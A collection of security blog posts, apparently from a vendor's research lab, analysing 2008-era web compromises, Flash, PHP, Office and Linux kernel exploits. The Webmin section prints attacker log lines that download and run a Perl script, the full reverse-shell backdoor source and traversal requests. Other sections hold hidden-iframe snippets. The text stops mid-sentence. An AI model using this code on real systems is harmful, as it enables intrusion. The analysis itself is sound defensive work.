At the time of writing, the download file was corrupted.

Last night our researchers identified similarities between the recent Adobe Flash exploits and a known (patched) vulnerability: CVE-2007-0071. At first, this appeared to close the case, but there was a report of a patched version of Flash falling victim to one of these attacks, and we’ve seen an SWF file referencing a missing file named WIN 9,0,124,0i.swf, which also suggests that the latest version of Flash is the target of that file.

The exploits that we have captured from the field do not appear to exploit the latest version of Flash. We continue to hunt for missing 9,0,124 exploits and will post an update should one be discovered. In the meantime, it’s best to update to the latest player, if you haven’t yet done so.

Here’s a quick update to the earlier post on a new unpatched Adobe Flash vulnerability.  Through looking for sites serving these SWF exploits we’ve found a connection with recent mass hacks.  Hacked sites reference an external script, just as they have for quite some time.  But, the external scripts now reference an SWF file.  This SWF file references another SWF file named: WIN%209,0,124,0i.swf (WIN 9,0,124,0i.swf), which seems to be off-line.  While we can not confirm this last SWF file attempts to exploit this new vulnerability, Symantec mentioned the same domain serving the exploit earlier.  SANS also mentions another domain, and 2 presumed exploits, named WIN%206,0,79,0ff.swf (WIN 6,0,79,0ff.swf), and WIN%206,0,79,0ie.swf (WIN 6,0,79,0ie.swf) also off-line.  These file names suggest 3 things.

1) Different exploits are crafted to exploit different versions of Adobe Flash, in this case 9,0,124,0 and 6,0,79,0.
2) Versions of the exploit may also exist, or be under development, to target other operating systems, as the aforementioned file names begin with WIN.
3) Exploits exist for both Internet Explorer and Firefox, as the file names end in “i”, “ie”, or “ff”

Thus far we’ve identified 2 particular domains involved in mass hacks that are also believed to have served these Flash exploits.  Combined, Google yields approximately 250,000 page results when searching for those references (ie. compromised sites that link to scripts that link to flash exploits).

Again this threat is still under analysis, more details to follow.

In March I blogged about a round of mass Web site compromises. Since then there have been several other instances discovered, as well as a couple of smoking guns. The net net is that the bad guys are using automated tools to find and attack Web applications that are vulnerable to SQL-injection attacks. Many of these applications are homegrown and thus there is no patch or hotfix for administrators to install. This means that simply removing the injected malicious code won’t last long.

Just now I was reviewing the latest batch of hacked sites, and I noticed pages that were previously compromised and “repaired,” only to be compromised again. The entry point for these attacks must be closed in order to thwart future attacks. This means that underlying code must be audited and improper input validation must be corrected. And given that many Web administrators install out-of-support freeware and shareware applications, we can expect many sites to remain vulnerable for a very long time.

McAfee’s Foundstone Hackme Shipping Tool can be a useful resource for those in need of a better understanding of how common Web application attacks occur and how to properly code against them.

Following the big noise that the latest mass injection of sites with malicious Javascripts infecting many computers via a number of exploits I decided to take a look at the trail that was left behind, which has proven to be an interesting exercise!

A few days ago I noticed a large number of websites that were misbehaving and I came across many pages that would fire up the usual ActiveX alert on my Internet Explorer 7 after loading a Javascript called (on this occasion) addr.js … Not surprisingly these were mostly based in China and here is a snippet of code that most of you would probably recognise by now.

So far nothing new, the Javascript function you can see above, designed by Dean Edwards to obfuscate HTML code, it has been discussed in many posts and this is a popular method for a web developers to “hide” sensitive source code on their pages. It is unfortunately also a popular method to hide malicious code too. and the example above does just that, in fact here are some interesting parts of the decoded version from the above example:

try{if(navigator.userAgent.toLowerCase().indexOf(”ms”+”ie 7″)==-1)

This will check if version of Internet Explorer is 7 and the script will then load the following IFRAMES depending on some other factors such as GMT, ActiveX, presence of Real Player version etc.

<iframe style=display:none src="http:// :///ms.gif">
<iframe style=display:none src=":///xl.gif">
<iframe style=display:none src="http:// :///bd.gif">
<iframe style=d'+'isp'+'lay:none src="http:// :///r'+'eal.g'+'if">
<iframe style=d'+'isp'+'lay:none src="http:///r'+'eal_new.g'+'if">
<iframe style=display:none src="http:// :///lz.gif">

As we can see 6 IFRAMES are hidden in the code, and they will load various pages with exactly the same exploits (with minor variations) that were used in the recent mass injection a couple of weeks ago.

So you might ask now, what’s new about that? Well, what is worrying is the fact that the pages loaded by the IFRAMES will attempt to grab some fake GIF (image) files that are in fact hiding more Javascript code but this time the code is obfuscated by yet another commercial tool called HTMLSHIP.

The following snippet is an example from one of the pages hiding a RealPlayer Exploit:

As you may have noticed this is pretty much un-readable but here is the important part of the code de-obfuscated using one of my favourite tools, the Caffeine-Monkey implementation of the Mozilla Browser engine from Ben Feinstein and Daniel Peck at SecureWorks.

----------

Above we can see the CLSID for the RealPlayer ActiveX Control.
And below we can see some of the code used to exploit the vulnerability described here.

----------------

So far I have seen a few variations in the domains used to host the various exploits involved as well as in the names for the Javascript file and we will be monitoring these for changes to see if it will be used more extensively in the future.

As of today the samples I discovered are still not detected by any AV … Well except one that is…

An additional note is the fact that the techniques used in obfuscating malicious Javascript on webpages are becoming more sophisticated and more difficult to signature for conventional AV Engines.
Nowadays there are a large number of tools similar to the ones mentioned above allowing malware authors to obfuscate with ease.

A quick parallel with binary files and their respective packers (compressors, protectors, encryptors and so on) this is not a new technique but as I said things are becoming more sophisticated just like with UPX vs the likes of Armadillo, ASProtect and others.

To hide or not To hide

In an Ideal world the people making this commercial protection software available should have no need to hide code in such convoluted ways and perhaps, in the case of web-design people should be more aware of other practices to make code secure and safe for copyrights and/or trademark reasons. For example server-side scripting, or using Ajax and Java for servlets.

If I was to embark in the task of leeching the code of a particularly interesting web-page and I understood the inner workings of scripting languages such as Javascript or the Microsoft implementation for IE’s JScript I would not be stopped by such trivial means of hiding the code that can be easily reverted to the original look with a few clicks and the latest version of a browser engine like the Mozilla Java-Script C engine.

Many Ideas are being brought forward in the field of packing and how to counteract the incredible rise in malware variants caused by it. Perhaps people making legitimate software and writing legitimate HTML code for web-pages should start coming to terms with the fact that “Security through Obscurity” has failed miserably to deliver and that, the cleaner their products the easier it will be for all of us to identify suspicious illegal software/code making the task of identifying the bad guys a little less daunting….. however this is far from an ideal world
Errr…. Linux anyone?

Sometime back we had come across this interesting vulnerability posted by a Chinese researcher in his blog, claiming to have found a zero day vulnerability in php 5.2.3.

We got a chance to dig a bit deeper into this and were able to reproduce the vulnerability based on the information provided in the blog. After investigation, we found that this vulnerablility affects not only verion 5.2.3 but also version 5.2.5. It is a heap overflow which can be triggered when a web server with PHP receives a malformed URI request, it can be a simple request like “GET /index.php/aa HTTP/1.1″ . Successful exploitation of this can result in arbitrary code execution with the privileges of the WEB Server.

This happens because the author misplaced the bracket resulting in miscalculation of the buffer which can result in a heap overflow. So fixing this issue is also simple viz: In \sapi\cgi\cgi-man.c do a grep for: “ptlen + env_path_info ? strlen(env_path_info) : 0;” , and replace this with “ptlen + (env_path_info ? strlen(env_path_info) : 0); ”

This is one of the classic examples of small human errors (which can sometime be even typos) that can result in vulnerabilities.

We had reported this issue to PHP dev team almost immediately after we had come to know about this issue in the wild and they’ve just come out with a patch for this. We highly recommend users to update with the latest version of PHP 5.2.6 released . This patch besides this issue, fixes a host of other security related fixes, some of which we deem as critical. This specific issue affects FastCGI packages of PHP.

This issue has been given the identifier CVE-2008-0599.

We shall continue to monitor this threat and update if we come across anything malicious.

Some news is in circulation regarding a recently disclosed (and patched) vulnerability in Adobe’s Flash. The attack used dereferenced NULL pointers, which were believed to be very hard to exploit.

The findings were first revealed in a paper called “Application-Specific Attacks: Leveraging the ActionScript Virtual Machine,”(pdf) by Mark Dowd. The paper described a new technique for causing exploitable memory corruption vulnerability in Adobe’s Flash. Whilst the technique has targeted the ActionScript Virtual Machine for Win32/Intel platform, it’s understood that the attack could be carried out on any other platforms where Flash is available. The real question is whether this attack can be more generic to target dereferenced NULL pointers in general!

It is possible to do so, but it’s not that easy. There are certain conditions an exploit of this type has to satisfy before reaching the ultimate goal. Dowd used some wacky techniques to inject malicious ActionScript byte code into Flash runtime (basically by crafting an SWF with something to trigger the vulnerability and point the execution to another loaded-in-memory part of the file that had the malicious content). Then he forced malloc() to fail by trying to allocate some huge memory chunk. When malloc() failed, it returned NULL.

(OK, at this step a program trying to access a NULL pointer would basically crash, and something to check for malloc() return value is necessary to prevent that crash.)

In this case, Flash didn’t check for malloc() failure and did some pointer arithmetic operation to add the value of the pointer (NULL here) to some offset. Now, this “offset” was controllable, and this is where Dowd had preloaded his malicious content. (Don’t get too excited, folks. There were quite a few other conditions that Dowd’s exploit had to meet before loading his payload. But I’m eliminating a lot of details to present the overall picture). So now we have a pretty successful and reproducible exploit on Flash ActionScript VM. It even bypassed Vista’s ASLR because Vista’s Flash was compiled with the runtime security bit off.

Now, scaling this attack against native code is more difficult in spite of the success it had against ActionScript VM. We will still be looking for a controllable offset and a place to preload our payload. Nevertheless, it is still a neat discovery when taking into consideration the level of complexity needed to load the malicious payload.

This discovery reflects a trend that it is possible to circumvent runtime security countermeasures such as ASLR and the like by targeting other environments with higher privileges running on top of the native platform. And if you’re involved in any secure development lifecycle, you’d better go and check your code!

A Microsoft Works ActiveX potential zero-day threat has been disclosed on a handful of Chinese blog sites. This threat was originally posted as a proof of concept that caused a Windows host to crash, but very soon after, a working exploit was posted. (Show of hands: Who’s surprised?)

Here’s the meat of this: The flaw lies in an ActiveX component of Microsoft Works Image Server (WkImgSrv.dll). Yes, it appears successful exploitation would allow for code execution via a controlled pointer. For this to occur, the victim would need to visit a malicious Web site.

On the plus side, this control is not marked safe, and attempts to use it should be accompanied with a warning from Internet Explorer. Even though this is the case, you will want to set the kill bit for clsid:00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6 to help mitigate. Initial testing on Windows XP SP2 and Internet Explorer 7 shows this to be easily exploitable once past the “warning” hurdle.

In the mean time, McAfee Avert Labs will continue researching this issue.

Update: June 6, 2008
Microsoft has confirmed that exploitation of this issue is not possible due to the control not being safe for scripting, nor safe for initialization. They have a nicely written, thorough write-up here explaining why.

There was an interesting article in InformationWeek this morning about a couple of security researchers who have presented the possibility of using offensive technologies to go after hackers. The most recent was Joel Eriksson from Bitsec, who presented at RSA last week about exploiting security holes in remote-access Trojans.

The article also brings up a five-year-old example of an earlier attempt at offensive technology to be used against hackers. In this case, Tom Liston created a tool called LaBrea (after the tar pits) that would ensnare computers which were being used to attack it either intentionally or due to worm infection.

There are plenty of people within the security industry who would like to be able to employ these tactics. The urge to take a pound of flesh for the late nights and weekends spent dealing with malware attacks is certainly understandable. But I know very few people in this industry who actually think it’s a sound idea, or worth the potential legal trouble.

Just as there are few locales where it is legal for you to shoot an intruder in your home, there are few locales where it is legal for you to attack those who intrude on your computer. Even in those locales where it is not illegal to attack an intruder, you must take into consideration the possible court costs. It’s highly likely the survivor (either the intruder or a family member) will sue you, and it will take some time with a lawyer to defend yourself against these charges. It’s entirely possible that a hacker or a worm-infected user would do likewise.

This is still assuming that your case was reasonably clear-cut, that it was genuinely a hacker or worm infection that was coming after you. It could just as easily be used as a sort of alternate flavor of Denial of Service attack–spoof the traffic or exploit a machine for the purpose of making it a target.

The general computing population is not particularly knowledgeable about the inner workings of their machines; some say there should be licensing such as for driving a car. It’s my opinion that there would first have to be this sort of licensing, and then a permit akin to a “Concealed Carry Permit” before this could be considered a good idea.

The Internet is a scary enough place without adding even more unskilled attackers.

Last week we discussed the fact that Microsoft credited three different researchers for reported CVE-2008-1087 during our monthly Patch Tuesday podcast. The fact that several independent researchers reported the issue suggested that others may not be far behind. This CVE pertains to the Microsoft Graphics Rendering Engine, which has a history of exploitation. In fact, McAfee’s Exploit-WMF detection for MS06-001 exploits was one of the top reported detections around the time that a patch was released. An exploit toolkit was released prior to the patch, which helped contribute to the number of exploits floating around. History may be repeating itself, though out of sequence.

Last Friday the first MS08-021 exploit was discovered in the field, three days after the issue was patched; and though it was not widespread, the discovery of the exploit did highlight the fact that attackers were actively working with exploit code. Today a basic exploit toolkit was posted publicly; and while this new toolkit is primitive, it may very well lead to “one-ups-manship” and the distribution of a more powerful tool.

Given the fact that a patch was released prior to this recent exploit activity it is unlikely that MS08-021 attacks will reach the level of MS06-001 attacks. However, there are still many many vulnerable systems out there, and we’ve seen prevalent exploits that have lasted for years after the issue was patched.

Just a month ago, we blogged about massive security incidents, relating to SQL injection attacks, that insert iframe links to remote sites that host exploit scripts and malware. Recently, we discovered the Fribet trojan, where the author was riding on both the success of such attacks and the controversy of the Tibet issue. The trojan was discovered on Pro-Tibet sites that were possibly hijacked to host Exploit-MS07-004, which appear to be specifically crafted.

When visitors of the pro-Tibet websites are infected, the Fribet trojan provides remote control and monitoring functions such as creating new files or folders, starting or terminating processes, and sending/receiving additional malware. Additionally, the Fribet trojan loads the “SQL Native Client” ODBC library, and is designed to receive arbitrary SQL statements from a command and control server. In turn, the ODBC library provides the functionality to Fribet to bind SQL connections and run arbitrary SQL commands from the victim machine(s). At the time of our research, the command and control server was not sending us commands. However, our reverse engineering of the malicious code shows it is more than capable of the following:

• Bind and connect to local or remote databases from the victim machine
• Query and steal data from local or remote databases
• Insert arbitrary data into local or remote databases, including web data such as hosting a web exploit

The attacker still needs to find out the information required to connect the database such as DSN, hostname, database name, User and Password, however, that information can be collected via other monitoring functions of Fribet, and it can also enumerate weak and default values.

This trojan apparently can be used as an alternate to SQL Injection attacks, but in a more direct way. Even the administrators of secure web sites, protected against common SQL injection attacks, should ensure database backends are equally secure to defend against such a penetration vector.

I made some interesting observations recently while looking through Webmin logs. It seems that someone was playing with Webmin worm/autorooter tools. Here is a piece of the webmin log:

root a8d0c740bd4d5be791fd9b31e80363d7 1.1.1.1 shell index.cgi "run" "-" "-" cmd='echo -n BUFUWUZHERE;hostname'
root a8d0c740bd4d5be791fd9b31e80363d7 1.1.1.1 shell index.cgi "run" "-" "-" cmd='echo -n BUFUWUZHERE;hostname'
root a8d0c740bd4d5be791fd9b31e80363d7 1.1.1.1 shell index.cgi "run" "-" "-" cmd='echo -n BUFUWUZHERE;uname -a;id;uptime'
root a8d0c740bd4d5be791fd9b31e80363d7 1.1.1.1 shell index.cgi "run" "-" "-" cmd='echo -n BUFUWUZHERE;unset HISTFILE HISTLOG HISTSAVE SCREEN'
root a8d0c740bd4d5be791fd9b31e80363d7 1.1.1.1 shell index.cgi "run" "-" "-" cmd='echo -n BUFUWUZHERE;ls'
root a8d0c740bd4d5be791fd9b31e80363d7 1.1.1.1 shell index.cgi "run" "-" "-" cmd='echo -n BUFUWUZHERE;wget aa.bb.cc/d.pl'
root a8d0c740bd4d5be791fd9b31e80363d7 1.1.1.1 shell index.cgi "run" "-" "-" cmd='echo -n BUFUWUZHERE;cat /etc/issue'
root a8d0c740bd4d5be791fd9b31e80363d7 1.1.1.1 shell index.cgi "run" "-" "-" cmd='echo -n BUFUWUZHERE;perl d.pl 2.2.2.2 2008'

Here we can see some suspicious activity. In particular, the Webmin root user connecting from 1.1.1.1 and trying to download and execute a perl script from aa.bb.cc on the system hosting Webmin. The script contained code to execute a shell + connect back to 2.2.2.2 on port 2008.

#!/usr/bin/perl
use Socket;
print "Data [removed] Backdoor\n\n”;
if (!$ARGV[0]) {
printf “Usage: $0 [Host] \n”;
exit(1);
}
print “[*] Dumping Arguments\n”;
$host = $ARGV[0];
$port = 80;
if ($ARGV[1]) {
$port = $ARGV[1];
}
print “[*] Connecting…\n”;
$proto = getprotobyname(’tcp’) || die(”Unknown Protocol\n”);
socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die (”Socket Error\n”);
my $target = inet_aton($host);
if (!connect(SERVER, pack “SnA4×8″, 2, $port, $target)) {
die(”Unable to Connect\n”);
}
print “[*] Spawning Shell\n”;
if (!fork( )) {
open(STDIN,”>&SERVER”);
open(STDOUT,”>&SERVER”);
open(STDERR,”>&SERVER”);
exec {’/bin/sh’} ‘-bash’ . “” x 4;
exit(0);
}
print “[*] Datached\n\n”;

By examining the Webmin log in further detail, it was possible to determine that the attacker used an older Webmin vulnerability (“Webmin Arbitrary File Disclosure Vulnerability (CVE-2006-3392)) to retrieve the webmin.log & sessiondb.pag files.

1.1.1.1 - - [02/Feb/2008:06:31:34 +0800] “GET /unauthenticated/ [lots ..%01/..%01/] /var/webmin/webmin.log HTTP/1.0″ 200 390944
1.1.1.1 - - [02/Feb/2008:06:31:42 +0800] “GET /unauthenticated/ [lots ..%01/..%01/] /var/webmin/sessiondb.pag HTTP/1.0″ 200 1024

The attacker then tried to access Webmin’s /shell/index.cgi page as follows:

1.1.1.1 - root [02/Feb/2008:06:31:46 +0800] “POST /shell/index.cgi HTTP/1.1″ 200 4921

We know that access to /shell/index.cgi requires authentication using a valid Webmin user and corresponding password. However, we see that the attacker was able to access this resource without supplying a password (we see that the HTTP response code is 200). It turns out that this was possible because Webmin stores user session ID values in the webmin.log & sessiondb.pag files. If an attacker can retrieve these files then they can re-use the session ID of a user to access resources as that user without having to supply a password.

For example, here is an entry in webmin.log:

[04/02/2008 15:26:59] root f3fe4b90803a41096af8880e2e948a24 x.x.x.x proc run.cgi “run” “-” “-” cmd=’ifconfig -a’ input=” mode=’0′

“f3fe4b90803a41096af8880e2e948a24″ is the session ID in this entry. These session IDs are valid for one week unless a user explicitly logs out of the Webmin interface by clicking the “logout” link. Since most users don’t do this, most session IDs continue to be valid long after they are needed. An attacker using a file disclosure vulnerability such as the one described above can attempt to retrieve + reuse these session IDs to impersonate users. The ability to impersonate users in this manner can lead to complete compromise of affected systems (because /shell/index.cgi can be used to execute arbitrary commands).

If you still run vulnerable webmin you should update it immediately or rename “/shell/index.cgi” script to avoid execute arbitrary commands by attacker. Since this attack vector came to automatic and already actively used in the wild.

A vulnerability has popped up (no pun intended…really) in Internet Explorer (IE) — or at least is claimed by a researcher named Juan Pablo Lopez Yacubian on the popular Bugtraq mailing list. It allows one to spoof the address of a popup without affecting the underlying page. This means that a bad guy could send the victim a legitimate link, have them follow it, and popup a spoofed window when they land on the attacker-controlled site (or hacked legitimate site). If this popup window is enticing enough, the attacker could persuade the victim to disclose information, click malicious links, or do other nefarious stuff.

There are a good amount of fairly obvious caveats for successful exploitation, however. First off, the victim must allow scripts to run, otherwise IE blocks it. Second, even if scripts are allowed, a good popup blocker should effectively be able to stop the window from popping up. Next, any click within the body of the popup will reveal the true identity of the address. Lastly, to be aesthetically pleasing, the address is limited to a certain character length.

All in all, this is nothing really spectacular…

That said, the main point here is to remind you to be sure to have basic browser protection (script blocking, trusted-domain model, popup blockers, etc.) in place and use common sense when you receive unsolicited links and unexpected popups.

Safe surfing…

Last week, I read some interesting news on an Australian website The Age. A journalist explained that a Russian malware distribution site offered a haul of 1000 spyware-infected Australian machines for 100USD, double the price offered for US machines and 30 times more than those from Asia.

Searching this site, I discovered the InstallsCash partnership program:

It was a well known dishonest offer: after registration, the affiliate had to put a short one line iframe code on his website pages. Next, and as explained in the FAQ, this hidden iframe would be used to silently redirect any visitor to another website to install (via an MPack like process) the affiliation program. Each successful installation made from the affiliate site would involve a payment.

To cover the tracks, the InstallsCash registrar is from China (bizcn.com). The fake registrant address is in the US (Iowa City) and the e-mail contact in Russia (ydwrtyxamz_at_mail.ru). It is easy to understand that this last name was randomly chosen. We will surely encounter some others in our investigations!

Being curious and to clearly demonstrate the dishonesty of the offer, I decided to subscribe myself by using some fake data to fill in the proposed form:

This screenshot is interesting; it lists the allowed system of payments. Here we recognize all the regular ones the cybercriminals are using. Having done that, I had to wait for 24 hours:

This Saturday at wake up, I tried my luck and attempted a connection. They activated my registration and my personal iframe code waited for me:

As I discussed first, the iframe I had to hide on my website pointed at another website using a strange name randomly chosen and created using a more or less automated method I discussed in a previous blog entry. It seems the affiliator creates or uses a different one for each affiliate. Thanks to these unique names, the software recognizes each of them. Data can be feed into their stats page and then they can calculate the payments.

On my personal page, the top white window contained my iframe. In the middle the affiliator gave me the same one, but in an encrypted form. It was not explained but it was clear I had to use this one on my pages to mislead or avoid some security technologies. The distributer goes so far as to say, and I quote, “they will be updating every 3 days and they will be invisible for every antivirus!”

The whois gave me the result I expected, which was something similar to InstallsCash.com:

Registrar was bizcn.com and registrant contact came with another improbable e-mail address:
Jan Dendinger ycsmmiqtyo_at_mail.ru
Phone +1 3196433xxx Fax: +13.196433xxx
309 East Main Street
West Branch IA 523581
us

Some quick searches with Google allowed me to find many other similar sites.

I looked at my stats page. Of course it was blank:

When the Age announced 100$ per 1000 unique loads, my rate table quoted the half and only 3$ for Asia:

But the journalist was right, in my private windows message as well as on the main page I could read InstallsCash made some special offer since February 16th: they increased their rates “for USA by 2 and any mix of country was about 30$”:

However, I note the price is still low compared with the payments these guys proposed in September 2006. But at that time, Australia and UK PC were the most wanted:

Yes, it seems that behind InstallCash, IframeCash (September 2006) and IframeDollars (November 2007) are hidden the same people. To understand this you can, for example compare the FAQs:

In November 2007, the RBNExploit blog discussed then that iFrameCash and iFrameDollars were possibly linked to the Russian Business Network. This confirms that RBN trading partners are still in business. And if they propose, since thay have been doing it for several years, commissions for deliberately planting malicious iframes, believe me, it is because it is a lucrative business.

Finally please note that via its ScriptScan module, McAfee VirusScan blocks and detects the PHP script as JS/Exploit-BO.gen. Moreover, the invisible files are detected as Downloader-BDH.

Recently, we blogged about MS Access exploits are being targeted trough Microsoft Word. In this blog we dig deeper, to see the structure of the files used in this attack, and analyze how the payload is delivered.

In the following example, the threat arrived as 2 files with “.doc” extensions (xxx1.doc and xxx2.doc); however one of the files is actually a Microsoft Access database containing the MS Jet exploit.  The whole story is depicted in Figure 1.

Figure 1: The flow of the trojan installation process

When users open the MS Word file xxx1.doc, the MS Access file xxx2.doc is loaded through the data link properties. Then the shellcode in the xxx2.doc file runs (triggered by the MS Jet exploit in the same file) and decodes itself in typical fashion.  The shell code launches WinWord.exe to open the innocent Word file embedded in “xxx1.doc”.

While the shellcode opens the Word file, it also decodes the executable file embedded in xxx1.doc. The decoding includes the simple XOR with a mask of 0xFF, and to deobfuscate the first 8 bytes of MZ header which is masked with XOR mask 0xAF.

You may see the data link aspect of xxx1.doc by placing the xxx2.doc file in a different folder than xxx1.doc. When users open xxx1.doc, the “Data Link Properties” window appears.  The specified database name is a the path containing xxx2.doc and the password is empty.  Because of this data link, xxx2.doc is typically loaded silently.

The trojan installation techniques used in this threat are nothing special and can be seen in other exploit files; however the method to trick users in this attack, by using non-exploit OLE files as loaders of other exploit OLE files is something new. As we see from past attacks, we no longer can rely on file extensions. We should continuously be careful with all unknown OLE files and not open untrusted email attachments.

A few weeks ago we blogged about a recent MS Access exploits being nothing new.  Well there is now something new.

On the heels of Symantec blogging about a new tandem Word document/Access database exploit; Microsoft released Security Advisory (950627).  As we stated before, Microsoft considers MDB files to be unsafe.  Accordingly, Microsoft email clients prevent users from attempting to double-click on MDB (Microsoft Access Database) files.  Up until recently attackers typically exploited MS Jet DB vulnerabilities through MDB files, and therefore Microsoft stuck to their “MDB files are unsafe” story.  Well that’s changed.

In several recent-yet limited-attacks, exploits were crafted to attack an MS Jet Database vulnerability through Word.  The Word docs are coded to reference Access database files regardless of extension (which allows attackers to circumvent content filters looking for specific email attachment extensions).

An attack scenario looks like this:

1. A user receives an email message with 2 attachments (one of which is a Word document)
2. The email client saves the attachments to the same directory
3. The user opens the Word document, which in turn opens the Access database containing the exploit code

In another scenario the attackers have archived both the database and Word document in a ZIP file, but the principle is the same.

Microsoft states that Msjet40.dll versions greater than 4.0.9505.0 are not vulnerable, which means this issue was (silently) fixed for Windows Server 2003 SP2 and Windows Vista.

McAfee DAT files version 5256 (released March 20) detect all known Access exploits as Exploit-MSJet.

Here’s a quick post about a claimed zero-day vulnerability in CA BrightStor ARCserve Backup, software that provides backup functionality for Windows systems. Proof-of-concept exploit code for this vulnerability is public.

A specially crafted Web page could trigger a stack overflow in the AddColumn() method in the ListCtrl Active X Control. For an attack to occur, a user would have to be tricked into visiting a malicious Web site. The exploit writer states that he has successfully run his attack code against CA BrightStor ARCserve Backup r11.5, with Internet Explorer 6 running on Microsoft Windows XP SP2 (the Polish edition).

McAfee Avert Labs is analyzing the flaw. As an aside, our research database reveals that the last known vulnerability in CA BrightStor ARCserve Backup was disclosed on November 26, 2007: CVE-2007-5328. CA worked with the discloser to release a patch for the vulnerability on the same day.

On the heels of recent iframe attacks, we’re currently tracking another mass compromise. This attack involves injection of script into valid web page to include a reference to a malicious .JS file (sometimes in the BODY, other times in the TITLE section). The .JS file uses script to write an IFRAME, which loads an HTML file that attempts to exploit several vulnerabilities, including:

• MS06-014
• RealPlayer (ActiveX Control)
• Baofeng Storm (ActiveX Control)
• Xunlei Thunder DapPlayer (ActiveX Control)
• Ourgame GLWorld GlobalLink Chat (ActiveX Control)

This is one of those cascading threats, where one page leads to another and another, which leads to an executable, which leads to another and another. At least one of the payload trojans targets online gamers.

Preliminary research results suggest more than 10,000 pages were affected by this hack attack.

Similar attacks were observed in the past; most notable the infamous “Dolphin Stadium” (aka Super Bowl) attack was similar, which was later connected with SQL injection as the method used by the attackers to inject their malicious code. In cases where the TITLE tag has been modified, the browser’s title bar will show the script reference:

Example of browser title bar (censored)

McAfee’s designations for the various pieces of malware include:

• Downloader-BGX
• Exploit-RealPlay
• JS/Exploit-BO.gen
• VBS/Psyme

Analysis is ongoing.

Recently our friends from Pandalabs published a weblog, stating there is a new Microsoft access exploit found in the wild. We initiated some research on this exploit and found it actually targets an older well known vulnerability, CVE-2005-0944, found by the hexview team in March 2005. It’s very easy to exploit this vulnerability. We had observed similar exploits last year, and the dropper used in this case looks very similar to that one.

Microsoft considers MDB files to be unsafe, so a specific patch for this vulnerability has not been released since it was made public 3 years ago.

The interesting thing about this vulnerability is that it happens in msjet40.dll, which was never updated on a Windows XP SP2 since the release of MS04-014 (for other platforms, please check out http://support.microsoft.com/kb/239114).

In this specific case, the dropper uses a jump address in mswstr10.dll, which is part of MS JET 4.0 engine package. So for XP SP2 users the trojan gets executed in almost all cases no matter whichever version of Office XP and 2003 you are using. We tested Office 2007, 2003 and XP and found that only Office 2007 was immune to this vulnerability.

McAfee AV detects this recent exploit via DAT 5236 which was released February 22 and our IntruShield NIPS sensors can detect and block this by our generic protection signatures for MS Access “HTTP: Microsoft Jet DB Engine Buffer Overflow” released on November 13, 2007.

Since Microsoft doesn’t patch Access-related vulnerabilities, we highly recommend Office users never open untrusted MDB files.

Today at Avert Labs, we released the third edition of Sage - our security journal. As always, we strive to be a bit different with our content in Sage. A little provocative, new trends, new ideas… And this issue is no different.

In this issue we look at the growing trend of localization in malware and threats. Cybercriminals are increasingly crafting attacks in multiple languages and are exploiting popular local applications to maximize their profits. Cybercrooks have become extremely deft at learning the nuances of the local regions and creating malware specific to each country. They’re not just skilled at computer programming—they’re skilled at psychology and linguistics, too.

We examined global malware trends in this report, titled “One Internet, Many Worlds.” The report is based on data compiled by our international security experts and examines the globalization of threats and the unique threats in different countries and regions. In the report, we detail the following trends and conclusions:

• Sophisticated malware authors have increased country-, language-, company-, and software-specific attacks
• Cyberattackers are increasingly attuned to cultural differences and tailor social engineering attacks accordingly
• Cybercrime rings recruit malware writers in countries with high unemployment and high levels of education such as Russia and China
• Cybercriminals take advantage of countries where law enforcement is lax
• Around the world, malware authors are exploiting the viral nature of Web 2.0 and peer-to-peer networks
• More exploits than ever before are targeted at locally popular software and applications

Download Sage 3

Zero-day emerges

On February 9, zero-day exploit code [1] was posted on milw0rm site. It exploited
vulnerability in Linux kernels Versions 2.6.17 to 2.6.24.1. This bug allows
an unprivileged local user to gain root privileges. This vulnerability was
assigned CVE-2008-0600.
There are reports that this exploit is reliable and actively used in the wild.
The inner workings of this exploit are quite interesting from the
technical point of view; let’s have a look.

Details on the vulnerability and methods of exploitation

The vulnerability lies in the get_iovec_page_array function
(in fs/splice.c, line numbers from 2.6.23.1-42.fc8 kernel),
reachable from the vmsplice() system function:

1286:       if (unlikely(!len)) // "len" variable is under user's
            control
1287:               break;
...
1296:       off = (unsigned long) base & ~PAGE_MASK;
...
1306:       npages = (off + len + PAGE_SIZE - 1) >> PAGE_SHIFT;
1307:       if (npages > PIPE_BUFFERS - buffers)
1308:               npages = PIPE_BUFFERS - buffers;
1309:
1310:       error = get_user_pages(current, current->mm,
1311:                              (unsigned long) base, npages, 0, 0,
1312:                              &pages[buffers], NULL);

The get_user_pages function expects its fourth argument (the
number of pages descriptors to fill; it limits the return value) to be at
least 1. In the preceding code it is assumed that the npages variable is at least 1 (because len must be nonzero, so the off + len + PAGE_SIZE - 1 expression should be greater or equal than PAGE_SIZE). However, if the len variable is close to UINT32_MAX, then the off + len + PAGE_SIZE -1 computation will result in an integer wrap, and npages can be zero.

As a result, get_user_pages may return more than
PIPE_BUFFERS entries, and the pages array will
overflow. However, the overflow payload is not controlled by the attacker,
so it would be difficult to turn this overflow into reliable code execution.

The reliable exploitation happens thanks to the subsequent loop:

1320:       for (i = 0; i > error; i++) {
1321:               const int plen = min_t(size_t, len,
                    PAGE_SIZE - off);
1322:
1323:               partial[buffers].offset = off;
1324:               partial[buffers].len = plen;
1325:
1326:               off = 0;
1327:               len -= plen;
1328:               buffers++;
1329:       }

Here, the partial array, which is also PIPE_BUFFERS
elements long, is overflowed with (off=0, plen=0×1000) pairs. Now, depending on the variables
layout chosen by the compiler, various data structures (that follow partial array) can be overwritten with zero. In the most common case, the pages array will be located after the partial array. The pages array contains pointers,
thus after the preceding loop, it will contain NULL pointers.

Normally, when the kernel tries to access a NULL pointer, it will result in an
exception and the process will be terminated. However, the attacker can map
memory pages at address zero, and store arbitrary data there. In such a scenario,
when the kernel dereferences pointers from the pages array,
attacker-controlled data will be processed, which may result in arbitrary
code execution in the kernel context. In our case, the convenient technique is
to make an entry in the pages array look as a compound page
descriptor, which will result in a function call to an attacker-controlled
address in user space:

37 static void put_compound_page(struct page *page)
   /* attacker controls arg */
38 {
39     page = (struct page *)page_private(page);
40     if (put_page_testzero(page)) {
41             void (*dtor)(struct page *page);
42
43             dtor = (void (*)(struct page *))page[1].lru.next;
44             (*dtor)(page); /* so attacker controls the target
                of the call
45     }
46 }

To sum up, the exploitation involves:

• integer overflow
• buffer overflow
• mapping the zero address to allow NULL dereference

Workarounds

The kernel upgrade is the preferred solution; but if it is not feasible, there
are workarounds.

A simple kernel module, which disables the sys_vmsplice system
call, has been posted [2].

The exploit we’ve discussed relies heavily on the possibility to map memory at
address zero. Starting with kernel 2.6.23, there is a mechanism to forbid such
